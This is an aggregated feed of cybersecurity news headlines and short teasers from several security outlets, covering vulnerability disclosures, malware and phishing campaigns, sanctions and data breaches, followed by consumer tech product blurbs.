Cybersecurity News

GitHub Desktop Vulnerability Risks Credential Leaks via Malicious Remote URLs

Multiple security vulnerabilities have been disclosed in GitHub Desktop as well as other Git-related projects that, if successfully exploited, could permit an attacker to gain unauthorized access to a user's Git credentials. "Git implements a protocol called Git Credential Protocol to retrieve credentials from the credential helper," GMO Flatt Security researcher Ry0taK, who discovered the flaws

⚡ THN Weekly Recap: Top Cybersecurity Threats, Tools and Tips [27 January]

Welcome to your weekly cybersecurity scoop! Ever thought about how the same AI meant to protect our hospitals could also compromise them? This week, we’re breaking down the sophisticated world of AI-driven threats, key updates in regulations, and some urgent vulnerabilities in healthcare tech that need our attention. As we unpack these complex topics, we'll equip you with sharp insights to

Do We Really Need The OWASP NHI Top 10?

The Open Web Application Security Project has recently introduced a new Top 10 project - the Non-Human Identity (NHI) Top 10. For years, OWASP has provided security professionals and developers with essential guidance and actionable frameworks through its Top 10 projects, including the widely used API and Web Application security lists.  Non-human identity security represents an emerging

GamaCopy Mimics Gamaredon Tactics in Cyber Espionage Targeting Russian Entities

A previously unknown threat actor has been observed copying the tradecraft associated with the Kremlin-aligned Gamaredon hacking group in its cyber attacks targeting Russian-speaking entities. The campaign has been attributed to a threat cluster dubbed GamaCopy, which is assessed to share overlaps with another hacking group named Core Werewolf, also tracked as Awaken Likho and PseudoGamaredon.

MintsLoader Delivers StealC Malware and BOINC in Targeted Cyber Attacks

Threat hunters have detailed an ongoing campaign that leverages a malware loader called MintsLoader to distribute secondary payloads such as the StealC information stealer and a legitimate open-source network computing platform called BOINC. "MintsLoader is a PowerShell based malware loader that has been seen delivered via spam emails with a link to Kongtuke/ClickFix pages or a JScript file,"

Meta's Llama Framework Flaw Exposes AI Systems to Remote Code Execution Risks

A high-severity security flaw has been disclosed in Meta's Llama large language model (LLM) framework that, if successfully exploited, could allow an attacker to execute arbitrary code on the llama-stack inference server.  The vulnerability, tracked as CVE-2024-50050, has been assigned a CVSS score of 6.3 out of 10.0. Supply chain security firm Snyk, on the other hand, has assigned it a

RANsacked: Over 100 Security Flaws Found in LTE and 5G Network Implementations

A group of academics has disclosed details of over 100 security vulnerabilities impacting LTE and 5G implementations that could be exploited by an attacker to disrupt access to service and even gain a foothold into the cellular core network. The 119 vulnerabilities, assigned 97 unique CVE identifiers, span seven LTE implementations – Open5GS, Magma, OpenAirInterface, Athonet, SD-Core, NextEPC,

2025 State of SaaS Backup and Recovery Report

The modern workplace has undergone a seismic transformation over recent years, with hybrid work becoming the norm and businesses rapidly adopting cloud-based Software-as-a-Service (SaaS) applications to facilitate it. SaaS applications like Microsoft 365 and Google Workspace have now become the backbone of business operations, enabling seamless collaboration and productivity. However, this

DoJ Indicts 5 Individuals for $866K North Korean IT Worker Scheme Violations

The U.S. Department of Justice (DoJ) on Thursday indicted two North Korean nationals, a Mexican national, and two of its own citizens for their alleged involvement in the ongoing fraudulent information technology (IT) worker scheme that seeks to generate revenue for the Democratic People's Republic of Korea (DPRK) in violation of international sanctions. The action targets Jin Sung-Il (진성일), Pak

Android's New Identity Check Feature Locks Device Settings Outside Trusted Locations

Google has launched a new feature called Identity Check for supported Android devices that locks sensitive settings behind biometric authentication when outside of trusted locations. "When you turn on Identity Check, your device will require explicit biometric authentication to access certain sensitive resources when you're outside of trusted locations," Google said in a post announcing the

CISA Adds Five-Year-Old jQuery XSS Flaw to Exploited Vulnerabilities List

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Thursday placed a now-patched security flaw impacting the popular jQuery JavaScript library to its Known Exploited Vulnerabilities (KEV) catalog, based on evidence of active exploitation. The medium-severity vulnerability is CVE-2020-11023 (CVSS score: 6.1/6.9), a nearly five-year-old cross-site scripting (XSS) bug that could be

Palo Alto Firewalls Found Vulnerable to Secure Boot Bypass and Firmware Exploits

An exhaustive evaluation of three firewall models from Palo Alto Networks has uncovered a host of known security flaws impacting the devices' firmware as well as misconfigured security features. "These weren't obscure, corner-case vulnerabilities," security vendor Eclypsium said in a report shared with The Hacker News. "Instead these were very well-known issues that we wouldn't expect to see

Beware: Fake CAPTCHA Campaign Spreads Lumma Stealer in Multi-Industry Attacks

Cybersecurity researchers are calling attention to a new malware campaign that leverages fake CAPTCHA verification checks to deliver the infamous Lumma information stealer. "The campaign is global, with Netskope Threat Labs tracking victims targeted in Argentina, Colombia, the United States, the Philippines, and other countries around the world," Leandro Fróes, senior threat research engineer at

New Research: The State of Web Exposure 2025

Are your websites leaking sensitive data? New research reveals that 45% of third-party apps access user info without proper authorization, and 53% of risk exposures in Retail are due to the excessive use of tracking tools. Learn how to uncover and mitigate these hidden threats and risks—download the full report here. New research by web exposure management specialist Reflectiz reveals several

Custom Backdoor Exploiting Magic Packet Vulnerability in Juniper Routers

Enterprise-grade Juniper Networks routers have become the target of a custom backdoor as part of a campaign dubbed J-magic. According to the Black Lotus Labs team at Lumen Technologies, the activity is so named for the fact that the backdoor continuously monitors for a "magic packet" sent by the threat actor in TCP traffic.  "J-magic campaign marks the rare occasion of malware designed&

Experts Find Shared Codebase Linking Morpheus and HellCat Ransomware Payloads

An analysis of HellCat and Morpheus ransomware operations has revealed that affiliates associated with the respective cybercrime entities are using identical code for their ransomware payloads. The findings come from SentinelOne, which analyzed artifacts uploaded to the VirusTotal malware scanning platform by the same submitter towards the end of December 2024. "These two payload samples are

How to Eliminate Identity-Based Threats

Despite significant investments in advanced technologies and employee training programs, credential and user-based attacks remain alarmingly prevalent, accounting for 50-80% of enterprise breaches[1],[2]. While identity-based attacks continue to dominate as the leading cause of security incidents, the common approach to identity security threats is still threat reduction, implementing layers of

SonicWall Urges Immediate Patch for Critical CVE-2025-23006 Flaw Amid Likely Exploitation

SonicWall is alerting customers of a critical security flaw impacting its Secure Mobile Access (SMA) 1000 Series appliances that it said has been likely exploited in the wild as a zero-day. The vulnerability, tracked as CVE-2025-23006, is rated 9.8 out of a maximum of 10.0 on the CVSS scoring system. "Pre-authentication deserialization of untrusted data vulnerability has been identified in the

QakBot-Linked BC Malware Adds Enhanced Remote Access and Data Gathering Features

Cybersecurity researchers have disclosed details of a new BackConnect (BC) malware that has been developed by threat actors linked to the infamous QakBot loader. "BackConnect is a common feature or module utilized by threat actors to maintain persistence and perform tasks," Walmart's Cyber Intelligence team told The Hacker News. "The BackConnect(s) in use were 'DarkVNC' alongside the IcedID

Cisco Fixes Critical Privilege Escalation Flaw in Meeting Management (CVSS 9.9)

Cisco has released software updates to address a critical security flaw impacting Meeting Management that could permit a remote, authenticated attacker to gain administrator privileges on susceptible instances. The vulnerability, tracked as CVE-2025-20156, carries a CVSS score of 9.9 out 10.0. It has been described as a privilege escalation flaw in the REST API of Cisco Meeting Management. "This

Trump Terminates DHS Advisory Committee Memberships, Disrupting Cybersecurity Review

The new Trump administration has terminated all memberships of advisory committees that report to the Department of Homeland Security (DHS).  "In alignment with the Department of Homeland Security's (DHS) commitment to eliminating the misuse of resources and ensuring that DHS activities prioritize our national security, I am directing the termination of all current memberships on advisory

TRIPLESTRENGTH Hits Cloud for Cryptojacking, On-Premises Systems for Ransomware

Google on Wednesday shed light on a financially motivated threat actor named TRIPLESTRENGTH for its opportunistic targeting of cloud environments for cryptojacking and on-premise ransomware attacks. "This actor engaged in a variety of threat activity, including cryptocurrency mining operations on hijacked cloud resources and ransomware activity," the tech giant's cloud division said in its 11th

Hackers Exploit Zero-Day in cnPilot Routers to Deploy AIRASHI DDoS Botnet

Threat actors are exploiting an unspecified zero-day vulnerability in Cambium Networks cnPilot routers to deploy a variant of the AISURU botnet called AIRASHI to carry out distributed denial-of-service (DDoS) attacks. According to QiAnXin XLab, the attacks have leveraged the security flaw since June 2024. Additional details about the shortcomings have been withheld to prevent further abuse. Some

Discover Hidden Browsing Threats: Free Risk Assessment for GenAI, Identity, Web, and SaaS Risks

As GenAI tools and SaaS platforms become a staple component in the employee toolkit, the risks associated with data exposure, identity vulnerabilities, and unmonitored browsing behavior have skyrocketed. Forward-thinking security teams are looking for security controls and strategies to address these risks, but they do not always know which risks to prioritize. In some cases, they might have

President Trump Pardons Silk Road Creator Ross Ulbricht After 11 Years in Prison

U.S. President Donald Trump on Tuesday granted a "full and unconditional pardon" to Ross Ulbricht, the creator of the infamous Silk Road drug marketplace, after spending more than 11 years behind bars. "I just called the mother of Ross William Ulbricht to let her know that in honor of her and the Libertarian Movement, which supported me so strongly, it was my pleasure to have just signed a full

PlushDaemon APT Targets South Korean VPN Provider in Supply Chain Attack

A previously undocumented China-aligned advanced persistent threat (APT) group named PlushDaemon has been linked to a supply chain attack targeting a South Korean virtual private network (VPN) provider in 2023, according to new findings from ESET. "The attackers replaced the legitimate installer with one that also deployed the group's signature implant that we have named SlowStepper – a

Oracle Releases January 2025 Patch to Address 318 Flaws Across Major Products

Oracle is urging customers to apply its January 2025 Critical Patch Update (CPU) to address 318 new security vulnerabilities spanning its products and services. The most severe of the flaws is a bug in the Oracle Agile Product Lifecycle Management (PLM) Framework (CVE-2025-21556, CVSS score: 9.9) that could allow an attacker to seize control of susceptible instances. "Easily exploitable

Mirai Botnet Launches Record 5.6 Tbps DDoS Attack with 13,000+ IoT Devices

Web infrastructure and security company Cloudflare on Tuesday said it detected and blocked a 5.6 Terabit per second (Tbps) distributed denial-of-service (DDoS) attack, the largest ever attack to be reported to date. The UDP protocol-based attack took place on October 29, 2024, targeting one of its customers, an unnamed internet service provider (ISP) from Eastern Asia. The activity originated

Mirai Variant Murdoc Botnet Exploits AVTECH IP Cameras and Huawei Routers

Cybersecurity researchers have warned of a new large-scale campaign that exploits security flaws in AVTECH IP cameras and Huawei HG532 routers to rope the devices into a Mirai botnet variant dubbed Murdoc Botnet. The ongoing activity "demonstrates enhanced capabilities, exploiting vulnerabilities to compromise devices and establish expansive botnet networks," Qualys security researcher Shilpesh

13,000 MikroTik Routers Hijacked by Botnet for Malspam and Cyberattacks

A global network of about 13,000 hijacked Mikrotik routers has been employed as a botnet to propagate malware via spam campaigns, the latest addition to a list of botnets powered by MikroTik devices. The activity "take[s] advantage of misconfigured DNS records to pass email protection techniques," Infoblox security researcher David Brunsdon said in a technical report published last week. "This

Ex-CIA Analyst Pleads Guilty to Sharing Top-Secret Data with Unauthorized Parties

A former analyst working for the U.S. Central Intelligence Agency (CIA) pleaded guilty to transmitting top secret National Defense Information (NDI) to individuals who did not have the necessary authorization to receive it and attempted to cover up the activity. Asif William Rahman, 34, of Vienna, was an employee of the CIA since 2016 and had a Top Secret security clearance with access to

HackGATE: Setting New Standards for Visibility and Control in Penetration Testing Projects

Imagine receiving a penetration test report that leaves you with more questions than answers. Questions like, "Were all functionalities of the web app tested?" or " Were there any security issues that could have been identified during testing?" often go unresolved, raising concerns about the thoroughness of the security testing. This frustration is common among many security teams. Pentest

PNGPlug Loader Delivers ValleyRAT Malware Through Fake Software Installers

Cybersecurity researchers are calling attention to a series of cyber attacks that have targeted Chinese-speaking regions like Hong Kong, Taiwan, and Mainland China with a known malware called ValleyRAT. The attacks leverage a multi-stage loader dubbed PNGPlug to deliver the ValleyRAT payload, Intezer said in a technical report published last week. The infection chain commences with a phishing

CERT-UA Warns of Cyber Scams Using Fake AnyDesk Requests for Fraudulent Security Audits

The Computer Emergency Response Team of Ukraine (CERT-UA) is warning of ongoing attempts by unknown threat actors to impersonate the cybersecurity agency by sending AnyDesk connection requests. The AnyDesk requests claim to be for conducting an audit to assess the "level of security," CERT-UA added, cautioning organizations to be on the lookout for such social engineering attempts that seek to

Unsecured Tunneling Protocols Expose 4.2 Million Hosts, Including VPNs and Routers

New research has uncovered security vulnerabilities in multiple tunneling protocols that could allow attackers to perform a wide range of attacks. "Internet hosts that accept tunneling packets without verifying the sender's identity can be hijacked to perform anonymous attacks and provide access to their networks," Top10VPN said in a study, as part of a collaboration with KU Leuven professor

DoNot Team Linked to New Tanzeem Android Malware Targeting Intelligence Collection

The Threat actor known as DoNot Team has been linked to a new Android malware as part of highly targeted cyber attacks. The artifacts in question, named Tanzeem (meaning "organization" in Urdu) and Tanzeem Update, were spotted in October and December 2024 by cybersecurity company Cyfirma. The apps in question have been found to incorporate identical functions, barring minor modifications to the

⚡ THN Weekly Recap: Top Cybersecurity Threats, Tools and Tips [20 January]

As the digital world becomes more complicated, the lines between national security and cybersecurity are starting to fade. Recent cyber sanctions and intelligence moves show a reality where malware and fake news are used as tools in global politics. Every cyberattack now seems to have deeper political consequences. Governments are facing new, unpredictable threats that can't be fought with

Product Walkthrough: How Satori Secures Sensitive Data From Production to AI

Every week seems to bring news of another data breach, and it’s no surprise why: securing sensitive data has become harder than ever. And it’s not just because companies are dealing with orders of magnitude more data. Data flows and user roles are constantly shifting, and data is stored across multiple technologies and cloud environments. Not to mention, compliance requirements are only getting

Hackers Deploy Malicious npm Packages to Steal Solana Wallet Keys via Gmail SMTP

Cybersecurity researchers have identified three sets of malicious packages across the npm and Python Package Index (PyPI) repository that come with capabilities to steal data and even delete sensitive data from infected systems. The list of identified packages is below - @async-mutex/mutex, a typosquat of async-mute (npm) dexscreener, which masquerades as a library for accessing liquidity pool

TikTok Goes Dark in the U.S. as Federal Ban Takes Effect January 19, 2025

Popular video-sharing social network TikTok has officially gone dark in the United States, as a federal ban on the app comes into effect on January 19, 2025. "We regret that a U.S. law banning TikTok will take effect on January 19 and force us to make our services temporarily unavailable," the company said in a pop-up message. "We're working to restore our service in the U.S. as soon as possible

U.S. Sanctions Chinese Cybersecurity Firm Over Treasury Hack Tied to Salt Typhoon

The U.S. Treasury Department's Office of Foreign Assets Control (OFAC) has imposed sanctions against a Chinese cybersecurity company and a Shanghai-based cyber actor for their alleged links to the Salt Typhoon group and the recent compromise of the federal agency. "People's Republic of China-linked (PRC) malicious cyber actors continue to target U.S. government systems, including the recent

Critical Flaws in WGS-804HPT Switches Enable RCE and Network Exploitation

Cybersecurity researchers have disclosed three security flaws in Planet Technology's WGS-804HPT industrial switches that could be chained to achieve pre-authentication remote code execution on susceptible devices. "These switches are widely used in building and home automation systems for a variety of networking applications," Claroty's Tomer Goldschmidt said in a Thursday report. "An attacker

Python-Based Bots Exploiting PHP Servers Fuel Gambling Platform Proliferation

Cybersecurity researchers have exposed a new campaign that targets web servers running PHP-based applications to promote gambling platforms in Indonesia. "Over the past two months, a significant volume of attacks from Python-based bots has been observed, suggesting a coordinated effort to exploit thousands of web apps," Imperva researcher Daniel Johnston said in an analysis. "These attacks

How to Bring Zero Trust to Wi-Fi Security with a Cloud-based Captive Portal?

Recent data breaches have highlighted the critical need to improve guest Wi-Fi infrastructure security in modern business environments. Organizations face increasing pressure to protect their networks while providing convenient access to visitors, contractors, temporary staff, and employees with BYOD. Implementing secure guest Wi-Fi infrastructure has become essential for authenticating access,

New 'Sneaky 2FA' Phishing Kit Targets Microsoft 365 Accounts with 2FA Code Bypass

Cybersecurity researchers have detailed a new adversary-in-the-middle (AitM) phishing kit that's capable of Microsoft 365 accounts with an aim to steal credentials and two-factor authentication (2FA) codes since at least October 2024. The nascent phishing kit has been dubbed Sneaky 2FA by French cybersecurity company Sekoia, which detected it in the wild in December. Nearly 100 domains hosting

U.S. Sanctions North Korean IT Worker Network Supporting WMD Programs

The U.S. Treasury Department's Office of Foreign Assets Control (OFAC) sanctioned two individuals and four entities for their alleged involvement in illicit revenue generation schemes for the Democratic People's Republic of Korea (DPRK) by dispatching IT workers around the world to obtain employment and draw a steady source of income for the regime in violation of international sanctions. "These

European Privacy Group Sues TikTok and AliExpress for Illicit Data Transfers to China

Austrian privacy non-profit None of Your Business (noyb) has filed complaints accusing companies like TikTok, AliExpress, SHEIN, Temu, WeChat, and Xiaomi of violating data protection regulations in the European Union by unlawfully transferring users' data to China. The advocacy group is seeking an immediate suspension of such transfers, stating the companies in question cannot shield user data

Russian Star Blizzard Targets WhatsApp Accounts in New Spear-Phishing Campaign

The Russian threat actor known as Star Blizzard has been linked to a new spear-phishing campaign that targets victims' WhatsApp accounts, signaling a departure from its longstanding tradecraft in a likely attempt to evade detection. "Star Blizzard's targets are most commonly related to government or diplomacy (both incumbent and former position holders), defense policy or international relations

Ready to Simplify Trust Management? Join Free Webinar to See DigiCert ONE in Action

The digital world is exploding. IoT devices are multiplying like rabbits, certificates are piling up faster than you can count, and compliance requirements are tightening by the day. Keeping up with it all can feel like trying to juggle chainsaws while riding a unicycle. Traditional trust management? Forget it. It's simply not built for today's fast-paced, hybrid environments. You need a

The $10 Cyber Threat Responsible for the Biggest Breaches of 2024

You can tell the story of the current state of stolen credential-based attacks in three numbers: Stolen credentials were the #1 attacker action in 2023/24, and the breach vector for 80% of web app attacks. (Source: Verizon). Cybersecurity budgets grew again in 2024, with organizations now spending almost $1,100 per user (Source: Forrester).  Stolen credentials on criminal forums cost as

MasterCard DNS Error Went Unnoticed for Years

The payment card giant MasterCard just fixed a glaring error in its domain name server settings that could have allowed anyone to intercept or divert Internet traffic for the company by registering an unused domain name. The misconfiguration persisted for nearly five years until a security researcher spent $300 to register the domain and prevent it from being grabbed by cybercriminals.

Chinese Innovations Spawn Wave of Toll Phishing Via SMS

Residents across the United States are being inundated with text messages purporting to come from toll road operators like E-ZPass, warning that recipients face fines if a delinquent toll fee remains unpaid. Researchers say the surge in SMS spam coincides with new features added to a popular commercial phishing kit sold in China that makes it simple to set up convincing lures spoofing toll road operators in multiple U.S. states.

Microsoft: Happy 2025. Here’s 161 Security Updates

Microsoft today unleashed updates to plug a whopping 161 security vulnerabilities in Windows and related software, including three "zero-day" weaknesses that are already under active attack. Redmond's inaugural Patch Tuesday of 2025 bundles more fixes than the company has shipped in one go since 2017.

A Day in the Life of a Prolific Voice Phishing Crew

Besieged by scammers seeking to phish user accounts over the telephone, Apple and Google frequently caution that they will never reach out unbidden to users this way. However, new details about the internal operations of a prolific voice phishing gang show the group routinely abuses legitimate services at Apple and Google to force a variety of outbound communications to their users, including emails, automated phone calls and system-level messages sent to all signed-in devices.

U.S. Army Soldier Arrested in AT&T, Verizon Extortions

Federal authorities have arrested and indicted a 20-year-old U.S. Army soldier on suspicion of being Kiberphant0m, a cybercriminal who has been selling and leaking sensitive customer call records stolen earlier this year from AT&T and Verizon. As first reported by KrebsOnSecurity last month, the accused is a communications specialist who was recently stationed in South Korea.

Happy 15th Anniversary, KrebsOnSecurity!

KrebsOnSecurity.com turns 15 years old today! Maybe it's indelicate to celebrate the birthday of a cybercrime blog that mostly publishes bad news, but happily many of 2024's most engrossing security stories were about bad things happening to bad guys. It's also an occasion to note that despite my publishing fewer stories than ever this past year, we somehow managed to attract near record levels of readership (thank you!).

Web Hacking Service ‘Araneida’ Tied to Turkish IT Firm

Cybercriminals are selling hundreds of thousands of credential sets stolen with the help of a cracked version of Acunetix, a powerful commercial web app vulnerability scanner, new research finds. The cracked software is being resold as a cloud-based attack tool by at least two different services, one of which KrebsOnSecurity traced to an information technology firm based in Turkey.

How to Lose a Fortune with Just One Bad Click

Adam Griffin is still in disbelief over how quickly he was robbed of nearly $500,000 in cryptocurrencies. A scammer called using a real Google phone number to warn his Gmail account was being hacked, sent email security alerts directly from google.com, and ultimately seized control over the account by convincing him to click "yes" to a Google prompt on his mobile device.

How Cryptocurrency Turns to Cash in Russian Banks

A financial firm registered in Canada has emerged as the payment processor for dozens of Russian cryptocurrency exchanges and websites hawking cybercrime services aimed at Russian-speaking customers, new research finds. Meanwhile, an investigation into the Vancouver street address used by this company shows it is home to dozens of foreign currency dealers, money transfer businesses, and cryptocurrency exchanges -- none of which are physically located there.

Patch Tuesday, December 2024 Edition

Microsoft today released updates to plug at least 70 security holes in Windows and Windows software, including one vulnerability that is already being exploited in active attacks. The zero-day seeing exploitation involves CVE-2024-49138, a security weakness in the Windows Common… Read More »

New VPN Backdoor

A newly discovered VPN backdoor uses some interesting tactics to avoid detection:

When threat actors use backdoor malware to gain access to a network, they want to make sure all their hard work can’t be leveraged by competing groups or detected by defenders. One countermeasure is to equip the backdoor with a passive agent that remains dormant until it receives what’s known in the business as a “magic packet.” On Thursday, researchers revealed that a never-before-seen backdoor that quietly took hold of dozens of enterprise VPNs running Juniper Network’s Junos OS has been doing just that...

Friday Squid Blogging: Beaked Whales Feed on Squid

A Travers’ beaked whale (Mesoplodon traversii) washed ashore in New Zealand, and scientists conlcuded that “the prevalence of squid remains [in its stomachs] suggests that these deep-sea cephalopods form a significant part of the whale’s diet, similar to other beaked whale species.”

Blog moderation policy.

Third Interdisciplinary Workshop on Reimagining Democracy (IWORD 2024)

Last month, Henry Farrell and I convened the Third Interdisciplinary Workshop on Reimagining Democracy (IWORD 2024) at Johns Hopkins University’s Bloomberg Center in Washington DC. This is a small, invitational workshop on the future of democracy. As with the previous two workshops, the goal was to bring together a diverse set of political scientists, law professors, philosophers, AI researchers and other industry practitioners, political activists, and creative types (including science fiction writers) to discuss how democracy might be reimagined in the current century...

AI Will Write Complex Laws

Artificial intelligence (AI) is writing law today. This has required no changes in legislative procedure or the rules of legislative bodies—all it takes is one legislator, or legislative assistant, to use generative AI in the process of drafting a bill.

In fact, the use of AI by legislators is only likely to become more prevalent. There are currently projects in the US House, US Senate, and legislatures around the world to trial the use of AI in various ways: searching databases, drafting text, summarizing meetings, performing policy research and analysis, and more. A Brazilian municipality ...

AI Mistakes Are Very Different from Human Mistakes

Humans make mistakes all the time. All of us do, every day, in tasks both new and routine. Some of our mistakes are minor and some are catastrophic. Mistakes can break trust with our friends, lose the confidence of our bosses, and sometimes be the difference between life and death.

Over the millennia, we have created security systems to deal with the sorts of mistakes humans commonly make. These days, casinos rotate their dealers regularly, because they make mistakes if they do the same task for too long. Hospital personnel write on limbs before surgery so that doctors operate on the correct body part, and they count surgical instruments to make sure none were left inside the body. From copyediting to double-entry bookkeeping to appellate courts, we humans have gotten really good at correcting human mistakes...

Biden Signs New Cybersecurity Order

President Biden has signed a new cybersecurity order. It has a bunch of provisions, most notably using the US governments procurement power to improve cybersecurity practices industry-wide.

Some details:

The core of the executive order is an array of mandates for protecting government networks based on lessons learned from recent major incidents­—namely, the security failures of federal contractors.

The order requires software vendors to submit proof that they follow secure development practices, building on a mandate that debuted in 2022 in response to ...

Friday Squid Blogging: Opioid Alternatives from Squid Research

Is there nothing that squid research can’t solve?

“If you’re working with an organism like squid that can edit genetic information way better than any other organism, then it makes sense that that might be useful for a therapeutic application like deadening pain,” he said.

[…]

Researchers hope to mimic how squid and octopus use RNA editing in nerve channels that interpret pain and use that knowledge to manipulate human cells.

Blog moderation policy.

Social Engineering to Disable iMessage Protections

I am always interested in new phishing tricks, and watching them spread across the ecosystem.

A few days ago I started getting phishing SMS messages with a new twist. They were standard messages about delayed packages or somesuch, with the goal of getting me to click on a link and entering some personal information into a website. But because they came from unknown phone numbers, the links did not work. So—this is the new bit—the messages said something like: “Please reply Y, then exit the text message, reopen the text message activation link, or copy the link to Safari browser to open it.”...

FBI Deletes PlugX Malware from Thousands of Computers

According to a DOJ press release, the FBI was able to delete the Chinese-used PlugX malware from “approximately 4,258 U.S.-based computers and networks.”

Details:

To retrieve information from and send commands to the hacked machines, the malware connects to a command-and-control server that is operated by the hacking group. According to the FBI, at least 45,000 IP addresses in the US had back-and-forths with the command-and-control server since September 2023.

It was that very server that allowed the FBI to finally kill this pesky bit of malicious software. First, they tapped the know-how of French intelligence agencies, which had ...

Phishing False Alarm

A very security-conscious company was hit with a (presumed) massive state-actor phishing attack with gift cards, and everyone rallied to combat it—until it turned out it was company management sending the gift cards.

Student Loan Breach Exposes 2.5M Records

2.5 million people were affected, in a breach that could spell more trouble down the line.

Watering Hole Attacks Push ScanBox Keylogger

Researchers uncover a watering hole attack likely carried out by APT TA423, which attempts to plant the ScanBox JavaScript-based reconnaissance tool.

Tentacles of ‘0ktapus’ Threat Group Victimize 130 Firms

Over 130 companies tangled in sprawling phishing campaign that spoofed a multi-factor authentication system.

Ransomware Attacks are on the Rise

Lockbit is by far this summer’s most prolific ransomware group, trailed by two offshoots of the Conti group.

Cybercriminals Are Selling Access to Chinese Surveillance Cameras

Tens of thousands of cameras have failed to patch a critical, 11-month-old CVE, leaving thousands of organizations exposed.

Twitter Whistleblower Complaint: The TL;DR Version

Twitter is blasted for security and privacy lapses by the company’s former head of security who alleges the social media giant’s actions amount to a national security risk.

Firewall Bug Under Active Attack Triggers CISA Warning

CISA is warning that Palo Alto Networks’ PAN-OS is under active attack and needs to be patched ASAP.

Fake Reservation Links Prey on Weary Travelers

Fake travel reservations are exacting more pain from the travel weary, already dealing with the misery of canceled flights and overbooked hotels.

iPhone Users Urged to Update to Patch 2 Zero-Days

Separate fixes to macOS and iOS patch respective flaws in the kernel and WebKit that can allow threat actors to take over devices and are under attack.

Google Patches Chrome’s Fifth Zero-Day of the Year

An insufficient validation input flaw, one of 11 patched in an update this week, could allow for arbitrary code execution and is under active attack.

Furious over the Pixel 4a update fiasco? You may be entitled to compensation

If Google's update ruined your phone's battery life, you can choose a battery replacement, a Google store credit, or a cash payment. Here's how.

Is this the iPhone SE 4? Leaked photos reveal major changes coming in 2025

Rumored to launch in April, the SE 4 sports a single camera, a notch, a USB-C port, and no more Home button, according to photos and a video shared by a known leaker.

You need this wireless charger with a built-in fan for your iPhone - here's why and how it works

Wireless chargers are known for their predisposition to generate heat during charging. The Torras PolarCircle solves this problem using science.

This 27-inch Asus smart monitor doubles as a Google TV for your office - and it impressed me

The Asus ZenScreen Smart Monitor will connect to just about any device you have - and can go from a TV to a gaming system to a work display.

This versatile HP laptop will satisfy business professionals and creatives alike

HP's EliteBook x360 1040 has an adaptable form factor with one of the best video conferencing experiences I've tested on a laptop.

Can Substack lure creators with its new $20 million program? Here's how it plans to do it

Substack has attracted thousands of independent writers, journalists, and creators over the last few years by allowing them to monetize their content through paid newsletters. It might be about to attract a lot more.

The Galaxy S25 Ultra S Pen is losing its Bluetooth superpowers - but Samsung has a pricey fix

While the Bluetooth-enabled S Pen doesn't come with the new phone, Samsung may be offering it separately for users who really want it.

My favorite bone conduction headphones for swimming just got a brilliant new feature

Bone conduction headsets let you stay aware while working out. The Nank Runner Diver2 Pro adds a new design element to take that idea even further.

How to remove Copilot from your Microsoft 365 plan

Copilot has muscled its way into Microsoft 365 with a price hike to boot. But you can remove the AI from Word and revert to the classic plan. Here's how.

Your Google Pixel 9 is getting a major audio upgrade - and it's coming for free

Bluetooth LE audio lets you listen to your Auracast-enabled hearing aids, headphones, speakers, and more.

72 hours later with Galaxy S25 Ultra - the AI hype is getting real for me

The lighter and thinner design, upgraded processor, and swath of Galaxy AI tools are top-notch, but has Samsung done enough to win you over?

The best NAS devices of 2025: Expert tested

We tested the top NAS storage devices that provide seamless storage solutions for personal and professional use.

Forget Galaxy S25: This is the Samsung phone I recommend to most people - and it's on sale

The Samsung Galaxy A35 isn't perfect, but its long battery life and OLED display make it a great phone for most. And it comes with a pair of free earbuds on Amazon.

Can you make an AirTag last 10 years? It took me a seconds to do it

I have over a dozen AirTags in use, and my biggest problem is having to change the batteries every year or so. No more!

Samsung Galaxy S25 Ultra vs Google Pixel 9 Pro XL: We tested both, and here's the winner

Samsung's new flagship phone, the Galaxy S25 Ultra, has arrived. Here's how it stacks up with the Google Pixel 9 Pro XL.

The best power banks you can buy in 2025: Expert tested and reviewed

We tested the best portable power banks from Anker, Ugreen, Omnicharge, and more to help you find the ultimate solution for reviving your drained devices.

Could your job be at risk due to AI? Do this before it's too late

I have 78 million reasons why your career depends on what you do today. Here is everything you need to know.

Your customers don't want more AI - here's what to invest in instead

There's a disturbing trend in Big Tech. Don't make the same mistake.

My new favorite travel accessory is a 3-in-1 MagSafe charger that's smaller than a cookie

Anker's MagGo 3-1 wireless charger is an ultraportable device that's dethroned even my favorite travel charger.

Should you switch to Wi-Fi 7? Here's my advice after testing a next-gen router at home

The Asus RT-BE86U has a slew of security tools, letting you enjoy the next generation of high-speed internet safely. But should you upgrade to one?

TalkTalk Confirms Data Breach, Downplays Impact

UK telecoms firm TalkTalk has confirmed falling victim to a data breach after a threat actor boasted about hacking it.

The post TalkTalk Confirms Data Breach, Downplays Impact appeared first on SecurityWeek.

Industry Moves for the week of January 27, 2025 - SecurityWeek

Explore industry moves and significant changes in the industry for the week of January 27, 2025. Stay updated with the latest industry trends and shifts.

LTE, 5G Vulnerabilities Could Cut Entire Cities From Cellular Connectivity

Vulnerabilities in LTE/5G core infrastructure, some remotely exploitable, could lead to persistent denial-of-service to entire cities.

The post LTE, 5G Vulnerabilities Could Cut Entire Cities From Cellular Connectivity appeared first on SecurityWeek.

Cyber Insights 2025: Cybersecurity Regulatory Mayhem

Cybersecurity regulations are facing a tipping point. There are too many and they are too complex to manage – and it’s getting worse.

The post Cyber Insights 2025: Cybersecurity Regulatory Mayhem appeared first on SecurityWeek.

Endor Labs and Allies Launch Opengrep, Reviving True OSS for SAST

Opengrep is a new consortium-backed fork of Semgrep, intended to be and remain a true genuine OSS SAST tool.

The post Endor Labs and Allies Launch Opengrep, Reviving True OSS for SAST appeared first on SecurityWeek.

Building Automation Protocols Increasingly Targeted in OT Attacks: Report

Industrial automation protocols continue to be the most targeted in OT attacks, but building automation systems have been increasingly targeted. 

The post Building Automation Protocols Increasingly Targeted in OT Attacks: Report appeared first on SecurityWeek.

Git Vulnerabilities Led to Credentials Exposure

Vulnerabilities in Git’s credential retrieval protocol could have allowed attackers to compromise user credentials.

The post Git Vulnerabilities Led to Credentials Exposure appeared first on SecurityWeek.

Change Healthcare Data Breach Impact Grows to 190 Million Individuals

The impact of the Change Healthcare ransomware-caused data breach has increased from 100 million to 190 million individuals.

The post Change Healthcare Data Breach Impact Grows to 190 Million Individuals appeared first on SecurityWeek.

Subaru Starlink Vulnerability Exposed Cars to Remote Hacking

A vulnerability in Subaru’s Starlink connected vehicle service exposed US, Canada, and Japan vehicle and customer accounts.

The post Subaru Starlink Vulnerability Exposed Cars to Remote Hacking appeared first on SecurityWeek.

